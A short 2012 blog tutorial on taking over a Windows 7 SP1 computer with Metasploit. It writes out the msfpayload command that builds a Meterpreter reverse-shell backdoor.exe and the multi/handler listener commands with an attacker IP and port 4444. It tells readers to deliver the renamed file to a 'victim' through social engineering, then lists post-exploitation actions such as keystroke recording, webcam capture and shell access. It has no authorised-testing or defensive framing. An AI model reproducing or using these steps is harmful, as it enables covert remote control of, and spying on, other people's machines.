Sunday, February 19, 2012


In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which �provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework�


My Video tutorial on youtube :http://www.youtube.com/watch?v=GiofrKO-v8A





Commands used:
msfpayload windows/meterpreter/reverse_tcp LHOST=�your Local I LPORT=�listening port� x > /root/backdoor.exe


I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is xxx.xxx.xx.x.

After that, you should be able to see a file named as backdoor.exe in /root. 

Send the file to the victim by using your Social Engineering skills and let him 

click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.128.168.128
set lport 4444
exploit







If all goes well, you should be able to establish a meterpreter session. Typesysinfo to gather some info on the machine. To know other commands


 for the meterpreter type help. There are also other meterpreter commands 

like capturing the screenshot of the PC, record keystrokes, capture a 
snapshot from a webcam, etc. To enter the command shell of the machine, type shell.

it,s cool to take a screenshot with meterpreter command screenshot.

0 comments:

Post a Comment